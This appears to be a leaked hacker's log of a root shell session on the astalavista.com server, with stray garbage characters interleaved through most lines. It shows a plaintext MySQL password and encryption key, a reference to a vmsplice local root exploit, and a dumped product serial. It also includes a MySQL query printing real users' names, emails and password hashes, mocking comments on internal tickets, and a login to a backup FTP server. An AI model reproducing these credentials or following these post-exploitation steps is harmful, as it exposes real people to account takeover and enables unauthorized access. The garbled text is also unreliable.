O% @/ Z* m) i8 O7 k0 `$conxPassword = ‘cXvB3981′; // MySQL password+ m L# ~; h" @* j5 t0 O
$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish. ?( |8 U1 }2 o7 F0 `9 g6 y
?>* b" d; @, H: M- k; E& N' `
0 m! S& V" |+ e0 q) \. x7 ~4 T( ]sh-3.2# cd ..
' R$ k! H5 l, C Ish-3.2# cd com
* f3 i! ^; t/ Z: ssh-3.2# ls -la
# {% Y* _1 t0 H2 Z7 ?3 ptotal 141208. @, O5 n7 c v% O. H$ L' f$ T6 C
drwx–x–x 10 com com 4096 Apr 28 12:40 .
8 b0 m; e0 b- L j+ X- y# C3 Kdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
& x* C1 `. L) T; s* d/ h6 z: X/ }drwx—— 2 com com 4096 Jun 4 04:04 backups
3 |9 @8 P! S( \, u' A# ?2 a$ K-rw-r–r– 1 root root 2419504 Sep 28 2007 backup.sql5 A: c& W/ [! F H
drwxr-xr-x 2 com com 4096 May 12 15:20 backup_system
$ F0 P0 B: j: b7 T-rw——- 1 com com 21880 Jun 2 08:07 .bash_history
- V0 c ]( i8 u-rw-r–r– 1 com com 24 Sep 24 2007 .bash_logout
5 T/ O, |" w1 j& I, h% D0 [-rw-r–r– 1 com com 176 Sep 24 2007 .bash_profile" K" @* G- n% `5 @9 K- h1 ]8 o* l
-rw-r–r– 1 com com 124 Sep 24 2007 .bashrc3 q& m/ C/ J% [
drwx–x–x 3 com com 4096 Jan 29 2008 domains
7 i3 i0 L" ]! q/ M) I" V4 d-rw-r–r– 1 com com 16409 Jul 16 2008 FWUser.class.php.fixed( ^% B- A# o% J1 C* Z
drwxrwx— 3 com mail 4096 Jan 6 19:24 imap6 c" `- w7 s8 K- v* K
-rw——- 1 com com 69 Nov 18 2008 .lesshst0 K, A" V8 S# Z
drwx—— 2 com com 4096 Sep 24 2007 mail
% ^: ]4 t$ K0 g5 M4 o-rw——- 1 com com 13970 Mar 28 21:42 .mysql_history
2 C4 d5 D2 l4 c, @drwxr-xr-x 2 com com 4096 Aug 20 2008 .ncftp/ O9 K; M( F( o; B4 I- T6 }6 c
lrwxrwxrwx 1 com com 37 Sep 24 2007 public_html -> ./domains/astalavista.com/public_html; ~2 z$ L' X& G" T7 J; P
-rw-r—– 1 com mail 34 Sep 24 2007 .shadow' c ] T8 e5 @' w% B) ~2 V
drwx—— 2 com com 4096 Aug 26 2008 .ssh
0 F& {- ?6 ]. S9 ]-rwx—— 1 com com 8515 Feb 10 2008 t
6 `6 Y7 L- y0 w: E' R-rw-rw-r– 1 com com 6265 Feb 11 2008 t.c
7 @& Z% U7 P" i+ g" w0 @: [drwxrwxr-x 2 com com 4096 Jan 30 15:47 tmp8 w, Q2 D2 A3 X, c4 g6 G. K
-rw-rw-r– 1 com com 617 May 20 2008 .toprc
6 n! B; u( h: i) b( s-rw-rw-r– 1 com com 141851766 May 19 2008 version2-backup-20080519-0900.sql
. u( @# h# T" ^! _3 X-rw——- 1 com com 16629 Mar 28 21:46 .viminfo
2 U9 p% Q {9 \' w-rw-rw-r– 1 com com 51 Aug 25 2008 .vimrc
# X, C# v$ ^5 K; K) O. c9 L$ `7 l2 V6 w7 l+ A8 e8 i
sh-3.2# head t.c, L: n. B6 c% a4 I8 K' G) t
/*/ h7 r" u1 i" ~9 p
* jessica_biel_naked_in_my_bed.c
( B: D4 I; k+ H+ e2 P*5 L r2 F9 Y: ^, L" _
* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.
3 X' q% f1 |6 g: \ ^3 ?* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca./ W' v) T, ^4 I8 _- m: @
* Stejnak je to stare jak cyp a aj jakesyk rozbite.
9 k3 h. Y) {0 ~2 o: Q! V*5 d3 U8 g9 R7 u, c
* Linux vmsplice Local Root Exploit
6 ?4 b3 }) D7 q {* By qaaz
6 \( m" B+ A& A3 `1 [+ U- o*
" b# v. @ z; i2 R' G- ~1 K- w8 j, H: n6 U
sh-3.2# cd /
, B4 U3 k+ ^: Rsh-3.2# ls -la
6 ], E; S, Y1 s& u8 U0 A gtotal 360. ?; G c5 {2 Y8 A1 Q" J1 u4 g
drwxr-xr-x 25 root root 4096 Jun 3 02:43 .* l# @6 H( `; J; ?1 c. X
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..9 ~7 |9 D( T7 R+ R. ^4 Y( G
-rw——- 1 root root 10240 Jun 3 02:39 aquota.group, f8 p- a" K9 u; ?
-rw——- 1 root root 10240 Jun 3 02:39 aquota.user" H3 o% G- [7 l2 x+ {
-rw-r—– 1 root root 819 Jul 17 2008 astalavista.us.db
' ^6 R5 B: b: K-rw-r–r– 1 root root 0 Jun 3 02:43 .autofsck
/ e- k6 N" r# M1 l# v5 @-rw-r–r– 1 root root 0 Sep 16 2007 .autorelabel
, k' o2 P# J! J+ r' v; ?& |) y. idrwxr-xr-x 3 root root 4096 Dec 29 2007 backup4 q: S0 u' ]' v0 F
drwxr-xr-x 2 root root 4096 Jun 4 04:03 bin
( g0 J5 P$ H( Y* _/ a1 tdrwxr-xr-x 5 root root 4096 Jun 2 14:06 boot
$ `4 i) W; A7 m6 `# Xdrwxr-xr-x 11 root root 3620 Jun 3 02:43 dev) f# S" Y) H5 }4 q% L
drwxr-xr-x 84 root root 12288 Jun 4 03:16 etc
0 ?; P- ` K6 V6 A' @& qdrwxr-xr-x 14 root root 4096 Mar 11 17:56 home7 r5 ~7 m6 g% F5 h
-rw-r–r– 1 root root 13387 Mar 20 2008 httpd.conf
% A% k2 C: P( @( v5 k) ]drwxr-xr-x 11 root root 4096 Jun 4 04:02 lib
S/ b8 j% b) w: H3 B- a: i- adrwxr-xr-x 7 root root 4096 Jun 4 04:03 lib645 ^- v* D, Z/ f9 }9 t/ w9 w
drwx—— 2 root root 16384 Sep 11 2007 lost+found
% ~2 w- V3 U7 q. _5 Q5 K+ Ldrwxr-xr-x 2 root root 4096 Mar 11 17:56 media
( j9 P; t! U6 \8 w6 `. f; Idrwxr-xr-x 2 root root 0 Jun 3 02:43 misc
8 f/ l' g% _! W3 d, |0 O. i! o/ z) ]drwxr-xr-x 2 root root 4096 Mar 11 17:56 mnt, l" k: n* Z8 F8 E0 l1 T4 G9 Z% v
-rw-r–r– 1 root root 5859 Feb 3 2008 mrtg.cfg
, a# n2 B0 A0 z" w9 j! Q: H$ x" `drwxr-xr-x 2 root root 0 Jun 3 02:43 net8 a6 O5 j5 B3 Y+ y
drwxr-xr-x 3 root root 4096 Mar 11 17:56 opt
/ r8 o; ]) ?* v; G: |+ Cdr-xr-xr-x 264 root root 0 Jun 3 02:42 proc
% g# r E! e/ N' p& j% L0 N! P5 qdrwxr-x— 15 root root 4096 Jun 4 08:40 root
; w7 a8 X0 J! ?; i/ ]# j; xdrwxr-xr-x 2 root root 12288 Jun 4 04:03 sbin
+ s& _, [7 z0 Z: m, q% Mdrwxr-xr-x 2 root root 4096 Mar 11 17:56 selinux& t( w6 ?6 C: g0 v* ]& j
drwxr-xr-x 2 root root 4096 Mar 11 17:56 srv* D7 j& u+ X" {: z' q1 D
drwxr-xr-x 11 root root 0 Jun 3 02:42 sys
' s6 Z9 h% k( b3 I$ Z g# ^drwxrwxrwt 4 root root 122880 Jun 4 10:35 tmp0 a/ R' F- X8 f! Z
drwxr-xr-x 16 root root 4096 Jun 2 13:56 usr
) H/ S- `. U9 }& e7 U1 odrwxr-xr-x 26 root root 4096 Jun 4 03:16 var, ~9 L1 {6 s% a6 e: b1 f# b: a
& V# ~5 h4 N m& a+ s
sh-3.2# cd opt+ s' U# C8 T) n5 j3 t6 l+ o
sh-3.2# ls -la
9 B* n% Q& e+ stotal 20
' q' C- o! O6 B& v8 edrwxr-xr-x 3 root root 4096 Mar 11 17:56 ." v8 A+ {1 ^3 o
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..# `# W: b7 o* c% F
drwxr-xr-x 15 root root 4096 Mar 20 2008 lsws
( V2 F1 p' z6 \( a8 K) N) Q, c+ l8 c/ x+ G8 `) u
sh-3.2# cd lsws/- L0 ?8 \! g5 ~* O
sh-3.2# ls -la
9 o# C2 Q2 b4 u9 @total 1081 d* e4 ?$ a* |" ^- E
drwxr-xr-x 15 root root 4096 Mar 20 2008 .
7 L/ o% u2 }" j0 _2 ]5 ~drwxr-xr-x 3 root root 4096 Mar 11 17:56 ..
! ^% i$ a, \- J) Fdrwxr-xr-x 8 root root 4096 Mar 20 2008 add-ons
0 H0 l0 n" n, Sdrwxr-xr-x 13 root root 4096 May 29 15:10 admin+ q+ ^% ]) w8 M& y% X2 S# F9 {
drwxr-xr-x 5 apache apache 4096 May 29 15:10 autoupdate+ a; B( @* _2 S9 m
drwxr-xr-x 2 root root 4096 May 29 15:10 bin! o! u8 W) f/ Q" n/ V; @0 j0 w4 H% ]& Q
drwx—— 4 apache apache 4096 Jun 3 02:43 conf, A/ k. B9 H7 ?! ~/ {
drwxr-xr-x 7 apache apache 4096 Mar 20 2008 DEFAULT. w$ Z) L. M) f1 ~( i% Z: ]
drwxr-xr-x 2 root root 4096 Sep 15 2008 docs
8 J1 Y/ n, }: |8 T# n- O! d. I7 Sdrwxr-xr-x 2 root root 4096 May 29 15:10 fcgi-bin
1 ^2 T- t' K5 |drwxr-xr-x 2 root root 4096 Sep 15 2008 lib
, R, I; A. `0 Z, V* N6 x) Q-rw-r–r– 1 root root 6959 May 29 15:10 LICENSE
% a/ L' {' _1 ?' t-rw-r–r– 1 root root 2214 May 29 15:10 LICENSE.OpenLDAP
8 X9 [( k" F6 @& `/ r! N-rw-r–r– 1 root root 6279 May 29 15:10 LICENSE.OpenSSL
( Y6 F5 \, r& B0 w- j5 k5 r' `-rw-r–r– 1 root root 3208 May 29 15:10 LICENSE.PHP+ Q( J0 F. W" f8 `0 R: ]* \
drwxr-xr-x 2 root root 20480 Jun 4 09:55 logs, {- ]& B6 Y* ^) t
drwxr-xr-x 2 root root 4096 Mar 20 2008 php* Y4 U/ {) @. m/ ^+ y, _/ D
drwx—— 2 apache apache 4096 Mar 20 2008 phpbuild; K$ b! O- `% s* v" v! R
drwxr-xr-x 3 root root 4096 Mar 20 2008 share
) A* J& I) p' M' s-rw-r–r– 1 root root 6 May 29 15:10 VERSION I0 n; `5 P$ o5 y$ C6 ~
0 m. y( S* B% b( {- Zsh-3.2# cd conf
2 r3 K5 o* N% T; jsh-3.2# ls -la
# A8 ?+ }- [& J( w* Mtotal 48. p. P) E3 i5 g( F
drwx—— 4 apache apache 4096 Jun 3 02:43 .
' D* C7 }( g& S* J! o" l! idrwxr-xr-x 15 root root 4096 Mar 20 2008 ..
$ V0 C* D! n9 | `: a$ Qdrwx—— 2 apache apache 4096 Mar 20 2008 cert8 }3 ^# W: x/ L# S7 t6 @
-rw-r–r– 1 apache apache 6668 May 29 15:13 httpd_config.xml7 E. r- p' o& A( v) n2 d `% _
-rw——- 1 apache apache 6613 May 27 18:33 httpd_config.xml.bak* ?9 J9 J2 R& c" P) H& D" l! |- {
-rw-r–r– 1 root apache 0 Jun 3 14:11 .last* n, v' o6 j$ Y# j. B
-rw——- 1 apache apache 256 May 29 15:10 license.key# W" Y! x% e/ x$ W+ E
-rw——- 1 apache apache 256 Mar 21 2008 license.key.old
Q- T3 G8 g' l8 N! z0 J-rw——- 1 apache apache 3320 Mar 20 2008 mime.properties
8 E" d( F0 {) P-rw——- 1 apache apache 20 May 29 15:10 serial.no0 @8 w5 a/ z% l+ S/ I) |
drwx—— 2 apache apache 4096 Mar 20 2008 templates
) Z! ~ J! I5 ]( v* D. E/ P* X: r/ h
sh-3.2# cat serial.no
3 o8 z5 `" R& M* ? CIbDl-oVsO-CKqL-wVRa% C" }7 b) {' F2 t% L1 s" J# ]4 z0 J
9 a8 P3 |# x* @) q( v( E: M7 K4 osh-3.2# mysql
; P+ @8 {6 ?% L* S7 J, @$ JWelcome to the MySQL monitor. Commands end with ; or \g.7 S1 V, ?+ M V& e
Your MySQL connection id is 286844
3 \* b2 C8 m7 _' u* Y M, [Server version: 5.0.45-community-log MySQL Community Edition (GPL)8 p! i- s4 ~, l2 W0 t
* y. ?& k4 j/ B& z$ _Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
1 s3 S6 {$ d. S. X& \( p/ }; S+ a. g
mysql> show databases;' d% G; C- \8 E. |
+———————–+
0 i7 k _% l' V" u- H| Database |
' h7 s0 n, O q# `1 J. |: x+———————–++ Y& _3 b2 m7 k: V. y. N+ c
| information_schema |* N$ Y6 Y: | p7 o) F, i4 G
| astanet_ads |
3 s( [/ l0 S1 ?: g2 @| astanet_mailing_lists |
1 `/ H! H7 P; ?! `% z' B' N! {| astanet_mediawiki |
+ g; L+ {! y$ b" O* {| astanet_membersystem |
7 ^" h! @) F+ R/ D| com_contrexx |3 D0 ]5 e4 l; @
| com_contrexx2 |
# s" ?8 _/ B: q2 ?% B| com_contrexx2_live |
, [1 V8 X7 U }6 I, j| da_roundcube |2 ^7 m5 `3 |3 L% `+ e
| dolphin |
' O1 \6 L- ^' ]/ Q4 [| ideapool |% o) i/ l h" Y; W0 ?, ?
| mysql |# }7 [ K! O3 i* c6 @/ Y$ _
| test |
: i. B8 t( I8 T, \( I| yourmaster |1 W `5 i* a. p
+———————–+. L8 S: z$ n8 y
14 rows in set (0.00 sec)( Y8 p! J9 i0 c$ q! d
) W. Y$ N$ |- |- p: Kmysql> use ideapool9 A# A" L# K- `) P0 i" T
Database changed: Z( I: ]" |7 W, j) g! T* V
mysql> show tables;
9 K- }7 V! V7 ~3 w9 `8 ~+———————————–+
1 ^3 p) q) d+ P7 }7 o5 q9 i6 A; X3 ^| Tables_in_ideapool |# M* \! J1 L: `5 x7 ~" z
+———————————–+! c1 J/ `# J, W' f, O5 r
| eventum_columns_to_display |
3 z t C$ L# e9 E$ Z( b8 a| eventum_custom_field |
7 V) \6 y& y" B- ~! W/ Q| eventum_custom_field_option |
2 }/ \1 b* q/ l7 S| eventum_custom_filter |3 W z0 P7 U' {% k! w+ J$ K
| eventum_customer_account_manager |/ O0 |. Y$ V1 f
| eventum_customer_note |3 M$ |1 p9 ]" K# v+ b: {$ `
| eventum_email_account |
/ Q4 H4 ~% v" a) z0 ?5 @| eventum_email_draft |$ D% F/ ~1 P( Q4 \, x/ p- a* T
| eventum_email_draft_recipient |: E0 _; v* c. w6 z. q! E
| eventum_email_response |
1 b. L) }2 m) {/ _| eventum_faq |! C- q) [9 o# m9 {5 z, j
| eventum_faq_support_level |
2 K5 ]3 v- |& b| eventum_group |& o v. T! O, c) x' y) x c
| eventum_history_type |
% q0 q1 i7 L* Y0 j% A& E+ L# P* w| eventum_irc_notice |0 e) u% z4 X9 V6 q, s0 [2 Y
| eventum_issue |; p7 l& K1 R/ ]4 y' k/ T, _
| eventum_issue_association |8 R) a$ k4 g; N% F+ U( z; u' c) |
| eventum_issue_attachment |
& ^0 t7 C! |4 z& o( T3 T" q| eventum_issue_attachment_file |5 y( X( z: b0 n2 R- G1 v1 t
| eventum_issue_checkin |
5 L2 C* H: I# g" v4 _* Q| eventum_issue_custom_field |$ e! O# H! M$ F3 L3 |
| eventum_issue_history |; S* w e `4 D" x
| eventum_issue_quarantine |
! [9 t9 r' O: C. z! }) }) J( t* }| eventum_issue_requirement |3 p% t( j2 a- J. M
| eventum_issue_user |
/ @; K5 f: {/ H6 u9 Q% Y! c* t& z| eventum_issue_user_replier |
2 T% p/ ~1 J6 u1 _( y+ ]- H# x| eventum_link_filter |* h% @" Q c' ~" p9 f2 M
| eventum_mail_queue |
; K3 F" B; Z! j+ ^8 l% x( q| eventum_mail_queue_log |
+ V' L& A2 d% A% T- X$ o1 i% l& b# m" ~1 ~| eventum_news |
# N; `7 y) ]/ J- a$ y| eventum_note |7 P8 h0 b. k5 I5 P' v
| eventum_phone_support |
9 M! F: G) T( e& B. Y- X x3 Y| eventum_project |
# ^' g& f* [3 f7 V2 R; x| eventum_project_category |
' V- G2 F0 D5 ^ ?6 b5 o j| eventum_project_custom_field |
$ _1 q5 v; [. @3 ~ e! A7 p0 l| eventum_project_email_response |
+ p" P& `( L. E| eventum_project_field_display |/ X/ }9 G5 d& Y1 @
| eventum_project_group |
( C6 }, ]2 `# W$ l9 i9 d| eventum_project_link_filter |0 F" m! H& H2 R, l
| eventum_project_news |
6 f D5 C J/ K( ^3 K7 `. M! y5 m' [| eventum_project_phone_category |# A6 j/ q6 h; c3 k* Y G8 X( g
| eventum_project_priority |
: P! u( c* u" N: V+ d0 _| eventum_project_release |
+ [0 X5 j3 x" {3 p| eventum_project_round_robin |% G4 G, I/ N# s) F0 k( W
| eventum_project_status |4 k7 p$ K+ h4 u+ O H
| eventum_project_status_date |
5 V1 J2 L/ \4 F9 }| eventum_project_user |
- x1 \+ D! h% K7 M' G5 Y/ i4 O| eventum_reminder_action |
: @) h3 W) [$ U: ]2 o! S| eventum_reminder_action_list |9 d# f8 }! K9 u1 @' P" u
| eventum_reminder_action_type |
% n( K0 P; z$ t9 @! Q/ g4 G| eventum_reminder_field |
; e/ x1 \5 g- v| eventum_reminder_history |
6 o- m* N4 c* E| eventum_reminder_level |( t* a/ N0 ~4 n
| eventum_reminder_level_condition |. g! Q, |" M) I5 [8 F. s: U
| eventum_reminder_operator |. z+ Q! l; I* J9 _$ z8 W
| eventum_reminder_priority |
0 y) ^( k) ~) w| eventum_reminder_requirement |# E. b: U6 w" x0 h) W
| eventum_reminder_triggered_action |
4 v1 p$ f+ r2 ?7 } w| eventum_resolution |
- m! q q. l7 z, p" ~1 g| eventum_round_robin_user |
- c% b3 \0 p9 l' g$ x: n| eventum_search_profile |! [, j4 ]' L3 p% T4 [
| eventum_status |
* R" W; Z# {6 n# b| eventum_subscription |
2 `- c/ Y1 f, C+ {| eventum_subscription_type |( E, A/ b x* W1 Q$ s* b
| eventum_support_email |3 w8 [2 q& ~& Q/ E/ w% r
| eventum_support_email_body |. O: o; |! C. H S( n9 X T
| eventum_time_tracking |
6 u4 `+ R% B" i( w# v| eventum_time_tracking_category |$ O* J, Q1 k H) N p
| eventum_user |
$ u! P: m4 L( ?1 l& m+ O/ |+———————————–+5 v! I+ d4 v$ q c& V' [* t4 _ K
69 rows in set (0.00 sec)
( K" T3 ~& C" p0 B2 \: p1 s- J' ~( H' ?, d& a
mysql> describe eventum_user;
1 U4 ?9 h9 p9 m& d2 V d7 _& s+————————-+——————+——+—–+———————+—————-+" j$ ]; V9 k5 C4 C+ [
| Field | Type | Null | Key | Default | Extra |4 T/ w" n2 \1 I7 V6 A
+————————-+——————+——+—–+———————+—————-+
+ x6 W) H8 H) }: {- T) l| usr_id | int(11) unsigned | NO | PRI | NULL | auto_increment |9 l% Q; S9 J0 L6 l* J
| usr_grp_id | int(11) unsigned | YES | MUL | NULL | |/ x0 j/ ]" \2 U; U; ~$ D5 k( y
| usr_customer_id | int(11) unsigned | YES | | NULL | |; L4 e* j2 k) f
| usr_customer_contact_id | int(11) unsigned | YES | | NULL | |
! Z7 G% O6 ~6 L' N: G6 C| usr_created_date | datetime | NO | | 0000-00-00 00:00:00 | |8 ?! l7 L. t2 O: M+ D
| usr_status | varchar(8) | NO | | active | |
8 U1 K7 ~5 p" X7 h| usr_password | varchar(32) | NO | | | |
+ R) d: C, ]4 ^| usr_full_name | varchar(255) | NO | | | |
5 \" E$ m* B7 Y; O W3 E% y* v| usr_email | varchar(255) | NO | UNI | | |
0 b; W7 c# u8 r| usr_preferences | longtext | YES | | NULL | |% H, P' F- ]" o- x0 C" E0 x
| usr_sms_email | varchar(255) | YES | | NULL | |+ J2 h6 ?9 I* [# h4 w2 z- i( ?5 ]
| usr_clocked_in | tinyint(1) | YES | | 0 | |, e9 m3 V0 u/ L: G6 w
| usr_lang | varchar(5) | YES | | NULL | |
, {' \& I7 K y% R4 z% u F4 |+————————-+——————+——+—–+———————+—————-+8 K. D0 ^' {- M, f3 j! u
13 rows in set (0.00 sec)
9 O& R3 Y" O+ n8 n1 M2 p1 M: M) ]5 d# [% S1 C' T' b: C, @( U
mysql> select usr_full_name,usr_email,usr_password from eventum_user;! ]( C6 v7 V* t0 h
+———————-+——————————-+———————————-+
0 `% d1 a2 B2 P3 k5 ?| usr_full_name | usr_email | usr_password |
T! {2 w# C: p& f) `& Z5 x) E+———————-+——————————-+———————————-+
9 M# D2 b$ t$ c8 C, @1 l5 g. p4 S| system | 链接标记system-account@example.com | 14589714398751513457adf349173434 |2 U6 @0 g; O3 M( ?. n) _4 ^( H# p
| Developer (Paulo) | 链接标记paulo.santos@astalavista.ch | 26a35a1cf8895c27fb37ef4cf149f7bb |
/ v' }7 s/ l* L/ I/ X| Be1er0ph0r | 链接标记be1er0ph0r@gmx.de | 229766dc0ca1fb67160a8782321dfdce |
5 z3 B+ `" e7 W| Admin | 链接标记pascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c |8 q& v! b) D- @9 |
| ADMIN | 链接标记admin@astalavista.ch | f6fdffe48c908deb0f4c3bd36c032e72 |
" i0 V8 U; B: a% M7 R# Q| USER | 链接标记user@astalavista.ch | 5cc32e366c87c4cb49e4309b75f57d64 |
. ^3 }& c' k7 [* q| Glafkos - (nowayout) | 链接标记glafkos@astalavista.com | f7735ab119023a8abb2301e67f81cd67 |' @+ F4 p N/ Y O, u
| Joao | 链接标记joao.pontes@astalavista.net | f805c071d7c823b937448c54c047b9fd |
" y( I: M) s# v| Pascal | 链接标记pm@astalavista.ch | e10adc3949ba59abbe56e057f20f883e |, Z: P7 k, P# f/ X. G3 k
| commander | 链接标记commander@astalavista.com | 932cd250918f881d41feb0b93883a926 |5 Y( f. k; G3 T* J& x& ` U
| ishtus | 链接标记ishtus@astalavista.com | a587ffc88b3dbbba3fd2fe67af649ff0 |, M! |7 W/ r! J' z( z; k
| sykadul | 链接标记sykadul@astalavista.com | 20224a2f3eeb57a13a10b4df543c128e |/ \! G! q8 `/ M' w6 O
| Zach McElroy | 链接标记admin@badfoo.net | 33c5d4954da881814420f3ba39772644 |
* T+ y$ P! {4 f7 ?8 z5 c| usb | 链接标记usbenigma@hushmail.com | b513f22c3db6932855ad732f5f8a10a2 |8 Y' N6 w7 c$ i* n
| cyph3r | 链接标记cyph3r@astalavista.com | 6e1e50017a945e874d52ec91f9ab2cee |, W( n# f( [/ \6 Z
+———————-+——————————-+———————————-+
8 G4 [6 @* A; K4 m: R& G! k5 x* V15 rows in set (0.00 sec)
' w- w% x" K) F/ c; V/ Q' i+ n1 z- e: F6 `0 ~9 i/ k
mysql> select iss_description from eventum_issue where iss_id = 43;3 J/ T" G2 V, w; |4 V- ^
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
8 U0 @1 O5 M+ g| iss_description
_2 b( x* F' c; k$ i|1 y$ C; x1 ^9 Z2 A( L
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+0 D2 X- V" B( q5 k) t; V+ a3 w
| Ok guys, to boost our traffic and revenue what we have to do is keep users logged in… how to do that? well think about it… if a user is watching a movie… he’ll be: P* v- {" u4 I/ s# a
connected for 90 mins… 120mins… so what i propose is something like:
: J& c- O4 y3 v链接标记[url]http://www.surfthechannel.com/[/url]
6 p7 d# X+ K+ p6 h% A3 ]1 usince they only provide LINKS to the movies they are LEGAL and don’t break DMCA rules… so we could do the same… “iframe” the content on our website or use a system2 E4 G" A& x- Y+ p
like podcast that uses our own flash player to stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only viewed… which doesn’t
$ Z4 j. W8 F4 a4 E2 u% bbreak any laws as far as i am aware (we should research on that just to be sure though!) Of course we would have to provide users with the button to take the content off3 t5 L- O8 M2 s q/ Z
if they think it breaks copyright laws and we will remove it… i think that makes it on the border of DMCA…1 }7 E+ M& U" f x, O
! f7 N- X$ F7 t' M1 M7 e: pWe could also put advertisement during play on the flash video player itself… extra $$…
) I5 Z3 y. x# U# m) y! _
5 E: _* {: `8 yBy sykadul |: w5 C* M7 Q& K
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
7 C" O4 Z; t9 q- c. U( q. g8 s1 row in set (0.00 sec)
$ _0 G& _1 {, u0 x" o! ^9 w3 ` M! l" k7 f2 A
// Money and extra $$ is all they care about. remember that.
: h% _- N, {1 z3 m" d
' b. n2 x; ^, ^7 Nmysql> select iss_summary,iss_description from eventum_issue where iss_id =42;3 p1 E: s( ~# n( p" e% r( ~2 d
+————————+——————————————————————————————————————————————————————————————————————————————-+) }; Y. H$ R5 H: t" s* _7 ^2 g1 j
| iss_summary | iss_description
* Z. G1 c& s8 e6 t|
5 A) w0 J" U4 b) C+————————+——————————————————————————————————————————————————————————————————————————————-+
4 [/ w9 T5 `9 D, @. E4 S| Forum for REAL EXPERTS | Hello,# k+ I! [* |, S5 G% K6 H
! h/ P% c% b) }; L4 GIshtus and I,% A3 \$ I4 e- A2 I" \6 F
0 s5 I# D: H2 ?5 m- L& O8 K
Came up with a crazy and very workable and professional idea. We create an invitation only forum with the BEST security experts worldwide$ K5 H3 n; |. P5 g/ n" L
ONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc..7 O. G L( O0 L; {! k
$ a ^' c9 S# A- D
One example a friend of mine from coresecurity.com!
% ?% B8 [" c6 ~' ^$ Z
' w6 C8 ~# h) ?! zWe could have big projects etc.. and we can work all together to bring to the security community exploits, open source software etc..
! @6 n2 `9 X4 U2 R8 d7 D
1 O/ t- L, u/ @ _1 M. e/ Y4 f|
~: m+ C1 t, K9 |3 A+————————+——————————————————————————————————————————————————————————————————————————————+# n: q3 ^5 V4 M# F& }( D
1 row in set (0.00 sec)2 v; V# q0 C5 u+ U
1 Q4 k p6 e" r+ k- z" l* N. y; c
// What an awesome yet original idea Ishtus and him… bring MORE security “experts”, thats exactly what the world needs…
( o& I2 g! E t/ V
9 q2 R- G9 |8 [& A+ cmysql> select iss_summary,iss_description from eventum_issue where iss_id = 16;
3 j+ r# I- j% `6 b+——————+———————————————————————————————+4 o/ I* `' q- H* C8 ~
| iss_summary | iss_description |
" {8 E( s1 g5 K% x& D1 j+——————+———————————————————————————————+' ?5 X, w* x" {8 G
| Website guidance | Virtual Girl which guides you trought the website./ n- T0 a6 v r* [% O6 D* o
& r$ M4 v# x3 b! c" l- {; {) |2 { KWe need a girl with who you can ( talk )!!! G$ ~4 x4 s. n+ U
Also for the News!
# f X) [" C# P/ k& @+ p' |$ YSo my suggestion is a girl who read you the news loud if you like!' {( R; l! b0 p" u/ ]7 y
you can choose between read yourselfe or she read it for you or both!+ x; x4 J/ K4 n1 g& H+ g4 R3 @
0 I3 i( S6 h, iGo to 链接标记[url]www.heise.de[/url]! There is an example for Voice News! It’s a good thing!!!$ Y( @0 C/ M) {" i% `* _8 R1 g
) k. r" }4 W( N' i* L1 q8 \Have a look on the example girls!!
1 X. R' A: q8 i7 l6 u; A$ `& z4 R3 R) t) f5 ?6 P
链接标记[url]http://www.yaoti.com/de/free_yaoti.html[/url]
# I4 j, v1 P- W* J) [
" n K- j; l1 u, I% |or that* M! U5 A' D3 w) S" W
- a2 L* e, X& B% J8 L. s7 Y链接标记[url]http://www.yellostrom.de/[/url]
- Z8 r" M Y5 G; z0 N7 E
8 h4 C7 n8 H u; b) A|) \/ c4 Z6 ]# I7 r
+——————+———————————————————————————————+
4 l6 X" y4 u* _' D- t8 @' D1 row in set (0.00 sec)/ F8 o7 v7 J5 t2 I% r" p) |6 x
# C/ x* J3 O& _5 [6 @% P
// ha ha.. ]2 i E7 g4 d! s2 T* H0 O
( @7 `+ l! f: [4 \. q: R
mysql> select iss_summary,iss_description from eventum_issue where iss_id = 7;
8 S9 ]" @ I; S2 A: }+————————–+———————————————————————————————————–+
- u) C) ]( ]8 e% C( m/ z9 X j| iss_summary | iss_description |
7 n. C( H; G. i# Q4 E/ Q+————————–+———————————————————————————————————–+
4 C0 u( c, W- s) n' ~, }| Exploit Development Team | We need an exploit development team to focus on exploit research and publication under Astalavista name. |
+ r+ s2 N( Q1 R- N. r% A* D+————————–+———————————————————————————————————–+
5 v# D$ d6 L- I# D, r: F1 row in set (0.00 sec)
" q" E# u" X3 Y8 k, ~* q5 Q+ T1 }# Q* d4 }6 t2 N6 F. R! T
// LOL.
4 R3 G7 T- E0 ~( c) _: m9 j- h$ c
: p- _( c5 Z* y3 Q" s, H" ]mysql> exit
) q( k6 U. _! ^Bye
6 t* g/ V$ X+ m9 @3 t: ~/ j
! ^/ A% f7 d4 D) p$ ~sh-3.2# ftp 212.254.194.1630 E0 z- L+ A |( y$ F% J
Connected to 212.254.194.163.+ j( s2 t; q9 X# S. f! q
220 BackupCOM_VW FTP server ready., M: |: N( L G+ s% A# h0 |6 U7 m) n
504 AUTH: security mechanism ‘GSSAPI’ not supported.
e* Q) q6 z; E& S504 AUTH: security mechanism ‘KERBEROS_V4′ not supported.; ]8 e& Z7 j1 f( x; w2 b& }
KERBEROS_V4 rejected as an authentication type% J; b6 t, p$ A8 ^# D8 x/ T
Name (212.254.194.163:root): astalavista.com3 o0 N: ^ o. g6 `
331 Password required for astalavista.com.
w1 X; t& {! g. z/ m" z, T9 ?/ B4 x! }Password:
1 O$ O& \0 ^/ h8 e9 [) c4 t( M7 P230 User astalavista.com logged in.5 N9 P( s& N% l; m7 }9 b! g* X: r0 Y
Remote system type is UNIX.3 J! d4 \* _- D" R, I* d3 s3 [
Using binary mode to transfer files.: }, g- y, v6 V: N `% ]
ftp> ls -la: l6 j4 Q8 d5 B( U
227 Entering Passive Mode (212,254,194,163,2,188)
